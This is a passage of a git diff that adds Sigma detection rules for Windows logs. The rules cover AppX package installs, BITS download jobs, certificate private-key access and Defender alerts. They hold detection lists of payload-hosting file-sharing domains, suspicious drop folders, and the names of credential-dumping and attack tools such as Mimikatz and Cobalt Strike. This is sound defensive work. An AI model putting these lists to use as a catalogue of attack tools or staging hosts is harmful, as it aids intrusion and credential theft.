https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ + - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ + - https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/01/11 +modified: 2023/01/12 +tags: + - attack.defense_evasion +logsource: + product: windows + service: appxdeployment-server +detection: + appxdeployment_server: + Channel: Microsoft-Windows-AppXDeploymentServer/Operational + selection: + EventID: + - 400 + - 401 + # Add more malicious package names + # TODO: Investigate the packages here https://github.com/sophoslabs/IoCs/blob/master/Troj-BazarBackdoor.csv based on this report https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ + PackageFullName|contains: 3669e262-ec02-4e9d-bcb4-3d008b4afac9 + condition: appxdeployment_server and selection +falsepositives: + - Rare occasions where a malicious package uses the exact same name and version as a legtimate application +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml new file mode 100644 index 000000000..99d4f86f5 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml @@ -0,0 +1,28 @@ +title: Deployment Of The AppX Package Was Blocked By The Policy +id: e021bbb5-407f-41f5-9dc9-1864c45a7a51 +status: test +description: Detects an appx package deployment that was blocked by the local computer policy +references: + - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting + - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv +author: frack113 +date: 2023/01/11 +tags: + - attack.defense_evasion +logsource: + product: windows + service: appxdeployment-server +detection: + appxdeployment_server: + Channel: Microsoft-Windows-AppXDeploymentServer/Operational + selection: + EventID: + - 441 + - 442 + - 453 + - 454 + condition: appxdeployment_server and selection +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml new file mode 100644 index 000000000..f820524a8 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml @@ -0,0 +1,27 @@ +title: Suspicious AppX Package Installation Attempt +id: 898d5fc9-fbc3-43de-93ad-38e97237c344 +status: test +description: Detects an appx package installation with the error code "0x80073cff" which indicates that the package didn't meet the signing requirements and could be suspicious +references: + - Internal Research + - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ + - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting + - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/01/11 +tags: + - attack.defense_evasion +logsource: + product: windows + service: appxdeployment-server +detection: + appxdeployment_server: + Channel: Microsoft-Windows-AppXDeploymentServer/Operational + selection: + EventID: 401 + ErrorCode: '0x80073cff' # Check ref section to learn more about this error code + condition: appxdeployment_server and selection +falsepositives: + - Legitimate AppX packages not signed by MS used part of an enterprise +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml new file mode 100644 index 000000000..c43119920 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml @@ -0,0 +1,52 @@ +title: Suspicious Remote AppX Package Locations +id: 8b48ad89-10d8-4382-a546-50588c410f0d +status: experimental +description: Detects an appx package added the pipeline of the "to be processed" packages which is downloaded from a suspicious domain +references: + - Internal Research + - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ + - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting + - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/01/11 +modified: 2023/08/17 +tags: + - attack.defense_evasion +logsource: + product: windows + service: appxdeployment-server +detection: + appxdeployment_server: + Channel: Microsoft-Windows-AppXDeploymentServer/Operational + selection: + EventID: 854 + Path|contains: + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) + - anonfiles.com + - cdn.discordapp.com + - cdn.discordapp.com/attachments/ + - ddns.net + - dl.dropboxusercontent.com + - ghostbin.co + - gofile.io + - hastebin.com + - mediafire.com + - mega.nz + - paste.ee + - pastebin.com + - pastebin.pl + - pastetext.net + - privatlab.com + - privatlab.net + - send.exploit.in + - sendspace.com + - storage.googleapis.com + - storjshare.io + - temp.sh + - transfer.sh + - ufile.io + condition: appxdeployment_server and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml new file mode 100644 index 000000000..9e2770315 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml @@ -0,0 +1,40 @@ +title: Suspicious AppX Package Locations +id: 5cdeaf3d-1489-477c-95ab-c318559fc051 +status: test +description: Detects an appx package added the pipeline of the "to be processed" packages which is located in suspicious locations +references: + - Internal Research + - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ + - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting + - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/01/11 +tags: + - attack.defense_evasion +logsource: + product: windows + service: appxdeployment-server +detection: + appxdeployment_server: + Channel: Microsoft-Windows-AppXDeploymentServer/Operational + selection: + EventID: 854 + Path|contains: + # Paths can be written using forward slash if the "file://" protocol is used + - C:\Users\Public\ + - /users/public/ + - C:\PerfLogs\ + - C:/perflogs/ + - \Desktop\ + - /desktop/ + - \Downloads\ + - /Downloads/ + - C:\Windows\Temp\ + - C:/Windows/Temp/ + - \AppdData\Local\Temp\ + - /AppdData/Local/Temp/ + condition: appxdeployment_server and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml new file mode 100644 index 000000000..ee7ec5baa --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml @@ -0,0 +1,40 @@ +title: Uncommon AppX Package Locations +id: c977cb50-3dff-4a9f-b873-9290f56132f1 +status: test +description: Detects an appx package added the pipeline of the "to be processed" packages which is located in uncommon locations +references: + - Internal Research + - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ + - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting + - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/01/11 +tags: + - attack.defense_evasion +logsource: + product: windows + service: appxdeployment-server +detection: + appxdeployment_server: + Channel: Microsoft-Windows-AppXDeploymentServer/Operational + selection: + EventID: 854 + filter_generic: + Path|contains: + # Paths can be written using forward slash if the "file://" protocol is used + - C:\Program Files\WindowsApps\ + - C:\Program Files (x86)\ + - C:\Windows\SystemApps\ + - C:\Windows\PrintDialog\ + - C:\Windows\ImmersiveControlPanel\ + - x-windowsupdate:// + - file:///C:/Program%20Files # Also covers 'file:///C:/Program%20Files%20(x86)/' + filter_specific: + Path|contains: + - https://statics.teams.cdn.office.net/ + - microsoft.com # Example: https://go.microsoft.com/fwlink/?linkid=2160968 + condition: appxdeployment_server and (selection and not 1 of filter_*) +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml b/tools/sigmac/converted_rules/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml new file mode 100644 index 000000000..88a35c0f0 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml @@ -0,0 +1,27 @@ +title: Suspicious Digital Signature Of AppX Package +id: b5aa7d60-c17e-4538-97de-09029d6cd76b +status: test +description: Detects execution of AppX packages with known suspicious or malicious signature +references: + - Internal Research + - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/01/16 +tags: + - attack.defense_evasion + - attack.execution +logsource: + product: windows + service: appxpackaging-om +detection: + appxpackaging_om: + Channel: Microsoft-Windows-AppxPackaging/Operational + selection: + EventID: 157 + # Add more known suspicious/malicious certificates used in different attacks + subjectName: CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization + condition: appxpackaging_om and selection +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml new file mode 100644 index 000000000..8111d31e2 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml @@ -0,0 +1,27 @@ +title: New BITS Job Created Via Bitsadmin +id: 1ff315dc-2a3a-4b71-8dde-873818d25d39 +status: test +description: Detects the creation of a new bits job by Bitsadmin +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md +author: frack113 +date: 2022/03/01 +modified: 2023/03/27 +tags: + - attack.defense_evasion + - attack.persistence + - attack.t1197 +logsource: + product: windows + service: bits-client +detection: + bits_client: + Channel: Microsoft-Windows-Bits-Client/Operational + selection: + EventID: 3 + processPath|endswith: \bitsadmin.exe + condition: bits_client and selection +falsepositives: + - Many legitimate applications or scripts could leverage "bitsadmin". This event is best correlated with EID 16403 via the JobID field +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_job_via_powershell.yml b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_job_via_powershell.yml new file mode 100644 index 000000000..a52378e16 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_job_via_powershell.yml @@ -0,0 +1,29 @@ +title: New BITS Job Created Via PowerShell +id: fe3a2d49-f255-4d10-935c-bda7391108eb +status: experimental +description: Detects the creation of a new bits job by PowerShell +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md +author: frack113 +date: 2022/03/01 +modified: 2023/03/27 +tags: + - attack.defense_evasion + - attack.persistence + - attack.t1197 +logsource: + product: windows + service: bits-client +detection: + bits_client: + Channel: Microsoft-Windows-Bits-Client/Operational + selection: + EventID: 3 + processPath|endswith: + - \powershell.exe + - \pwsh.exe + condition: bits_client and selection +falsepositives: + - Administrator PowerShell scripts +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml new file mode 100644 index 000000000..fa21ec421 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml @@ -0,0 +1,41 @@ +title: BITS Transfer Job Downloading File Potential Suspicious Extension +id: b85e5894-9b19-4d86-8c87-a2f3b81f0521 +status: experimental +description: Detects new BITS transfer job saving local files with potential suspicious extensions +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md +author: frack113 +date: 2022/03/01 +modified: 2023/03/27 +tags: + - attack.defense_evasion + - attack.persistence + - attack.t1197 +logsource: + product: windows + service: bits-client +detection: + bits_client: + Channel: Microsoft-Windows-Bits-Client/Operational + selection: + EventID: 16403 + LocalName|endswith: + # TODO: Extend this list with more interesting file extensions + - .bat + - .dll + - .exe # TODO: Might wanna comment this if it generates tons of FPs + - .hta + - .ps1 + - .psd1 + - .sh + - .vbe + - .vbs + filter_optional_generic: + # Typical updates: Chrome, Dropbox etc. + LocalName|contains: \AppData\ + RemoteName|contains: .com + condition: bits_client and (selection and not 1 of filter_optional_*) +falsepositives: + - While the file extensions in question can be suspicious at times. It's best to add filters according to your environment to avoid large amount false positives +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml new file mode 100644 index 000000000..1a7525653 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml @@ -0,0 +1,53 @@ +title: BITS Transfer Job Download From File Sharing Domains +id: d635249d-86b5-4dad-a8c7-d7272b788586 +status: experimental +description: Detects BITS transfer job downloading files from a file sharing domain. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md + - https://twitter.com/malmoeb/status/1535142803075960832 + - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker +author: Florian Roth (Nextron Systems) +date: 2022/06/28 +modified: 2023/08/17 +tags: + - attack.defense_evasion + - attack.persistence + - attack.t1197 +logsource: + product: windows + service: bits-client +detection: + bits_client: + Channel: Microsoft-Windows-Bits-Client/Operational + selection: + EventID: 16403 + RemoteName|contains: + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) + - anonfiles.com + - cdn.discordapp.com + - cdn.discordapp.com/attachments/ + - ddns.net + - dl.dropboxusercontent.com + - ghostbin.co + - gofile.io + - hastebin.com + - mediafire.com + - mega.nz + - paste.ee + - pastebin.com + - pastebin.pl + - pastetext.net + - privatlab.com + - privatlab.net + - send.exploit.in + - sendspace.com + - storage.googleapis.com + - storjshare.io + - temp.sh + - transfer.sh + - ufile.io + condition: bits_client and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml new file mode 100644 index 000000000..084075335 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml @@ -0,0 +1,78 @@ +title: BITS Transfer Job Download From Direct IP +id: 90f138c1-f578-4ac3-8c49-eecfd847c8b7 +related: + - id: 99c840f2-2012-46fd-9141-c761987550ef + type: similar +status: experimental +description: Detects a BITS transfer job downloading file(s) from a direct IP address. +references: + - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin + - https://isc.sans.edu/diary/22264 + - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ + - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/01/11 +modified: 2023/03/27 +tags: + - attack.defense_evasion + - attack.persistence + - attack.t1197 +logsource: + product: windows + service: bits-client +detection: + bits_client: + Channel: Microsoft-Windows-Bits-Client/Operational + selection: + EventID: 16403 + RemoteName|contains: + - http://1 + - http://2 + - http://3 + - http://4 + - http://5 + - http://6 + - http://7 + - http://8 + - http://9 + - https://1 + - https://2 + - https://3 + - https://4 + - https://5 + - https://6 + - https://7 + - https://8 + - https://9 + filter_optional_local_networks: + RemoteName|contains: + - ://10. # 10.0.0.0/8 + - ://192.168. # 192.168.0.0/16 + - ://172.16. # 172.16.0.0/12 + - ://172.17. + - ://172.18. + - ://172.19. + - ://172.20. + - ://172.21. + - ://172.22. + - ://172.23. + - ://172.24. + - ://172.25. + - ://172.26. + - ://172.27. + - ://172.28. + - ://172.29. + - ://172.30. + - ://172.31. + - ://127. # 127.0.0.0/8 + - ://169.254. # 169.254.0.0/16 + filter_optional_seven_zip: + RemoteName|contains: + # For https://7-zip.org/ + - https://7- + - http://7- + condition: bits_client and (selection and not 1 of filter_optional_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml new file mode 100644 index 000000000..7796f954c --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml @@ -0,0 +1,33 @@ +title: BITS Transfer Job With Uncommon Or Suspicious Remote TLD +id: 6d44fb93-e7d2-475c-9d3d-54c9c1e33427 +status: experimental +description: Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md + - https://twitter.com/malmoeb/status/1535142803075960832 +author: Florian Roth (Nextron Systems) +date: 2022/06/10 +modified: 2023/03/27 +tags: + - attack.defense_evasion + - attack.persistence + - attack.t1197 +logsource: + product: windows + service: bits-client +detection: + bits_client: + Channel: Microsoft-Windows-Bits-Client/Operational + selection: + EventID: 16403 + filter_main_generic: + RemoteName|contains: + - .azureedge.net/ + - .com/ + - .sfx.ms/ + - download.mozilla.org/ # https://download.mozilla.org/?product=firefox-101.0.1-partial-101.0&os=win64&lang=en-US + condition: bits_client and (selection and not 1 of filter_main_*) +falsepositives: + - This rule doesn't exclude other known TLDs such as ".org" or ".net". It's recommended to apply additional filters for software and scripts that leverage the BITS service +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml new file mode 100644 index 000000000..f96ad5b9f --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml @@ -0,0 +1,31 @@ +title: BITS Transfer Job Download To Potential Suspicious Folder +id: f8a56cb7-a363-44ed-a82f-5926bb44cd05 +status: experimental +description: Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md +author: Florian Roth (Nextron Systems) +date: 2022/06/28 +modified: 2023/03/27 +tags: + - attack.defense_evasion + - attack.persistence + - attack.t1197 +logsource: + product: windows + service: bits-client +detection: + bits_client: + Channel: Microsoft-Windows-Bits-Client/Operational + selection: + EventID: 16403 + LocalName|contains: + # TODO: Add more interesting suspicious paths + - \Desktop\ + - C:\Users\Public\ + - C:\PerfLogs\ + condition: bits_client and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/capi2/win_capi2_acquire_certificate_private_key.yml b/tools/sigmac/converted_rules/builtin/capi2/win_capi2_acquire_certificate_private_key.yml new file mode 100644 index 000000000..d61e45198 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/capi2/win_capi2_acquire_certificate_private_key.yml @@ -0,0 +1,25 @@ +title: Certificate Private Key Acquired +id: e2b5163d-7deb-4566-9af3-40afea6858c3 +status: experimental +description: Detects when an application acquires a certificate private key +references: + - https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html +author: Zach Mathis +date: 2023/05/13 +tags: + - attack.credential_access + - attack.t1649 +logsource: + product: windows + service: capi2 + definition: 'Requirements: The CAPI2 Operational log needs to be enabled' +detection: + capi2: + Channel: Microsoft-Windows-CAPI2/Operational + selection: + EventID: 70 # Acquire Certificate Private Key + condition: capi2 and selection +falsepositives: + - Legitimate application requesting certificate exports will trigger this. Apply additional filters as needed +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/category/antivirus/av_exploiting.yml b/tools/sigmac/converted_rules/builtin/category/antivirus/av_exploiting.yml new file mode 100644 index 000000000..3ac97d0b9 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/category/antivirus/av_exploiting.yml @@ -0,0 +1,69 @@ +title: Antivirus Exploitation Framework Detection +id: 238527ad-3c2c-4e4f-a1f6-92fd63adb864 +status: stable +description: Detects a highly relevant Antivirus alert that reports an exploitation framework +references: + - https://www.nextron-systems.com/?s=antivirus + - https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797 + - https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424 + - https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466 +author: Florian Roth (Nextron Systems), Arnim Rupp +date: 2018/09/09 +modified: 2023/01/13 +tags: + - attack.execution + - attack.t1203 + - attack.command_and_control + - attack.t1219 +logsource: + category: antivirus + product: windows + service: windefend +detection: + antivirus: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' + - 1006 + - 1007 + - 1008 + - 1009 + - 1010 + - 1011 + - 1012 + - 1115 + - 1116 + - 1017 + - 1018 + - 1019 + - 1115 + - 1116 + Channel: Microsoft-Windows-Windows Defender/Operational + selection: + ThreatName|contains: + - MeteTool + - MPreter + - Meterpreter + - Metasploit + - PowerSploit + - CobaltStrike + - BruteR + - Brutel + - Swrort + - Rozena + - Backdoor.Cobalt + - CobaltStr + - COBEACON + - Cometer + - Razy + - IISExchgSpawnCMD + - Exploit.Script.CVE + - Seatbelt + - Sbelt + - Sliver + condition: antivirus and selection +fields: + - FileName + - User +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/category/antivirus/av_hacktool.yml b/tools/sigmac/converted_rules/builtin/category/antivirus/av_hacktool.yml new file mode 100644 index 000000000..15567e5d0 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/category/antivirus/av_hacktool.yml @@ -0,0 +1,86 @@ +title: Antivirus Hacktool Detection +id: fa0c05b6-8ad3-468d-8231-c1cbccb64fba +status: stable +description: Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool +references: + - https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/ + - https://www.nextron-systems.com/?s=antivirus +author: Florian Roth (Nextron Systems), Arnim Rupp +date: 2021/08/16 +modified: 2023/02/03 +tags: + - attack.execution + - attack.t1204 +logsource: + category: antivirus + product: windows + service: windefend +detection: + antivirus: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' + - 1006 + - 1007 + - 1008 + - 1009 + - 1010 + - 1011 + - 1012 + - 1115 + - 1116 + - 1017 + - 1018 + - 1019 + - 1115 + - 1116 + Channel: Microsoft-Windows-Windows Defender/Operational + selection: + - ThreatName|startswith: + - HTOOL + - HKTL + - SecurityTool + - Adfind + - ATK/ + - Exploit.Script.CVE + # - 'FRP.' + - PWS. + - PWSX + - ThreatName|contains: + - Hacktool + - ATK/ # Sophos + - Potato + - Rozena + - Sbelt + - Seatbelt + - SecurityTool + - SharpDump + - Sliver + - Splinter + - Swrort + - Impacket + - Koadic + - Lazagne + - Metasploit + - Meterpreter + - MeteTool + - Mimikatz + - Mpreter + - Nighthawk + - PentestPowerShell + - PowerSploit + - PowerSSH + - PshlSpy + - PSWTool + - PWCrack + - Brutel + - BruteR + - Cobalt + - COBEACON + - Cometer + - DumpCreds + - FastReverseProxy + - PWDump + condition: antivirus and selection +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/category/antivirus/av_password_dumper.yml b/tools/sigmac/converted_rules/builtin/category/antivirus/av_password_dumper.yml new file mode 100644 index 000000000..401b08f6b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/category/antivirus/av_password_dumper.yml @@ -0,0 +1,63 @@ +title: Antivirus Password Dumper Detection +id: 78cc2dd2-7d20-4d32-93ff-057084c38b93 +status: stable +description: Detects a highly relevant Antivirus alert that reports a password dumper +references: + - https://www.nextron-systems.com/?s=antivirus + - https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619 + - https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448 +author: Florian Roth (Nextron Systems) +date: 2018/09/09 +modified: 2023/01/18 +tags: + - attack.credential_access + - attack.t1003 + - attack.t1558 + - attack.t1003.001 + - attack.t1003.002 +logsource: + category: antivirus + product: windows + service: windefend +detection: + antivirus: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' + - 1006 + - 1007 + - 1008 + - 1009 + - 1010 + - 1011 + - 1012 + - 1115 + - 1116 + - 1017 + - 1018 + - 1019 + - 1115 + - 1116 + Channel: Microsoft-Windows-Windows Defender/Operational + selection: + - ThreatName|startswith: PWS + - ThreatName|contains: + - DumpCreds + - Mimikatz + - PWCrack + - HTool/WCE + - PSWTool + - PWDump + - SecurityTool + - PShlSpy + - Rubeus + - Kekeo + - LsassDump + - Outflank + - DumpLsass + - SharpDump + - PWSX + - PWS. + condition: antivirus and selection +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/category/antivirus/av_ransomware.yml b/tools/sigmac/converted_rules/builtin/category/antivirus/av_ransomware.yml new file mode 100644 index 000000000..044ed3c27 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/category/antivirus/av_ransomware.yml @@ -0,0 +1,61 @@ +title: Antivirus Ransomware Detection +id: 4c6ca276-d4d0-4a8c-9e4c-d69832f8671f +status: test +description: Detects a highly relevant Antivirus alert that reports ransomware +references: + - https://www.nextron-systems.com/?s=antivirus + - https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916 + - https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7 + - https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045 + - https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d + - https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c +author: Florian Roth (Nextron Systems), Arnim Rupp +date: 2022/05/12 +modified: 2023/02/03 +tags: + - attack.t1486 +logsource: + category: antivirus + product: windows + service: windefend +detection: + antivirus: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' + - 1006 + - 1007 + - 1008 + - 1009 + - 1010 + - 1011 + - 1012 + - 1115 + - 1116 + - 1017 + - 1018 + - 1019 + - 1115 + - 1116 + Channel: Microsoft-Windows-Windows Defender/Operational + selection: + ThreatName|contains: + - Ransom + - Cryptor + - Crypter + - CRYPTES + - GandCrab + - BlackWorm + - Phobos + - Destructor + - Filecoder + - GrandCrab + - Krypt + - Locker + - Ryuk + - Ryzerlo + - Tescrypt + - TeslaCrypt + condition: antivirus and selection +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/category/antivirus/av_relevant_files.yml b/tools/sigmac/converted_rules/builtin/category/antivirus/av_relevant_files.yml new file mode 100644 index 000000000..cab783e17 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/category/antivirus/av_relevant_files.yml @@ -0,0 +1,99 @@ +title: Antivirus Relevant File Paths Alerts +id: c9a88268-0047-4824-ba6e-4d81ce0b907c +status: test +description: Detects an Antivirus alert in a highly relevant file path or with a relevant file name +references: + - https://www.nextron-systems.com/?s=antivirus +author: Florian Roth (Nextron Systems), Arnim Rupp +date: 2018/09/09 +modified: 2023/10/23 +tags: + - attack.resource_development + - attack.t1588 +logsource: + category: antivirus + product: windows + service: windefend +detection: + antivirus: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' + - 1006 + - 1007 + - 1008 + - 1009 + - 1010 + - 1011 + - 1012 + - 1115 + - 1116 + - 1017 + - 1018 + - 1019 + - 1115 + - 1116 + Channel: Microsoft-Windows-Windows Defender/Operational + selection_path: + Path|contains: + # could be startswith, if 